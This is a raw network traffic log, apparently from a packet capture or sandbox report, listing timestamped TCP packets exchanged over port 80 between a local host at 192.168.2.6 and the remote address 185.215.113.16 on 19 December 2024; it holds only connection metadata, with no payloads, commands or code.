Dec 19, 2024 10:10:10.998517990 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:10.998572111 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.007452965 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.007514000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.007519960 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.007559061 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.015394926 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.015464067 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.015484095 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.015522957 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.023936987 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.023997068 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.024054050 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.032274008 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.032329082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.032399893 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.144624949 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.144674063 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.144761086 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.145901918 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.145977020 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.146116018 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.150816917 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.150888920 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.150953054 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.156090975 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.156148911 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.156224966 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.160988092 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.161046982 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.161111116 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.165991068 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.166052103 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.166105032 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.170510054 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.170571089 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.170636892 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.175344944 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.175445080 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.175502062 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.180330038 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.180357933 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.180422068 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.185139894 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.185172081 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.185234070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.190068007 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.190095901 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.190151930 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.194775105 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.194801092 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.194859982 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.199526072 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.199970007 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.200047016 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.204608917 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.204705000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.204862118 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.209404945 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.209455967 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.209471941 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.209503889 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.214281082 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.214338064 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.214344978 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.214381933 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.336990118 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.337125063 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.337202072 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.338788033 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.338922024 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.338983059 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.343002081 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.343059063 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.343235016 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.347126007 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.347182989 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.347242117 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.350970984 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.351066113 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.351114988 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.355066061 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.355123043 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.355191946 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.358658075 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.358721018 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.358783007 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.362631083 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.362689972 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.362751961 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.362802982 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.366633892 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.366772890 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.366836071 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.370615005 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.370713949 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.370774031 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.374571085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.374700069 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.374762058 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.378709078 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.378803968 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.378866911 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.382694006 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.382719040 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.382750988 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.382771015 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.386823893 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.386851072 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.386903048 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.390618086 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.390638113 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.390683889 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.394733906 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.394762993 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.394804955 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.398634911 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.398663044 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.398710012 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.402645111 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.402672052 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.402723074 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.406630039 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.406652927 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.406701088 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.410556078 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.410593987 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.410648108 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.414817095 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.414872885 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.414998055 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.418602943 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.418658972 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.418669939 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.418701887 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.422697067 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.422754049 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.422761917 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.422820091 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.427576065 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.427632093 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.427637100 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.427685022 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.431930065 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.431988955 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.431991100 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.432024956 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.532176971 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.532233000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.532309055 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.533684969 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.533782005 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.533948898 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.537004948 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.537062883 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.537178040 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.539810896 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.539900064 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.539964914 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.543037891 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.543097973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.543153048 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.546171904 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.546228886 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.546231985 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.546288013 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.548945904 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.549009085 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.549149036 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.549197912 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.552400112 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.552450895 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.552459002 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.552506924 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.554897070 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.554936886 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.554948092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.554976940 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.557667017 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.557708025 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.557720900 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.557749033 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.560405970 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.560452938 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.560501099 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.560549021 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.563491106 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.563539982 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.563594103 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.563638926 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.566337109 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.566386938 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.566538095 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.566581964 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.569405079 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.569451094 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.569704056 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.569746017 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.572499037 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.572799921 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.572860956 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.575685978 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.575711012 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.575756073 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.578409910 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.578496933 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.578547001 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.581458092 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.581506014 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.581506014 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.581948996 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.584393978 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.584439993 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.584485054 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.584527969 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.587646008 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.587671995 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.587698936 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.587713957 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.590455055 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.590507030 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.590553999 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.593400002 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.593447924 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.593503952 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.593549967 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.596436024 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.596479893 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.596767902 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.596829891 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.599667072 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.599701881 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.599716902 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.599740028 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.602668047 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.602694035 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.602746010 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.605462074 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.605541945 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.605592012 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.608778000 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.608825922 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.608828068 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.608876944 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.611676931 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.611725092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.611819029 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.611864090 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.614443064 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.614559889 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.614607096 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.617682934 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.617708921 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.617738962 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.617765903 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.620620966 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.620666027 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.620714903 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.623594999 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.623918056 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.623990059 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.626652956 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.626704931 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.626921892 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.626980066 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.629831076 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.629878998 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.629918098 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.629995108 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.633059978 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.633333921 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.633366108 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.633378029 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.635742903 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.635802984 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.635854006 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.635899067 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.638669968 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.638797998 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.638858080 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.641561985 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.641612053 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.641872883 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.641923904 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.644829988 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.644877911 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.644915104 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.644957066 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.647655964 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.647988081 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.648035049 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.650881052 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.650907040 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.650933027 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.650948048 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.653677940 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.653727055 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.721193075 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.721213102 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.721285105 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.721894026 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.721921921 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.722055912 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.722055912 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.724195004 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.724281073 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.724334955 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.726170063 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.726253033 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.726319075 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.728559971 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.728758097 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.728815079 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.731049061 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.731110096 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.731189013 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.733400106 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.733459949 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.733556986 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.733954906 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.735912085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.735969067 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.736071110 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.737972021 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.738089085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.738137007 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.738179922 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.738229036 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.740273952 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.740355968 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.740394115 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.740468979 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.742806911 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.742860079 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.742949009 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.742995977 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.744729042 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.744776011 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:11.744852066 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:11.744893074 CET	49860	80	192.168.2.6	185.215.113.16
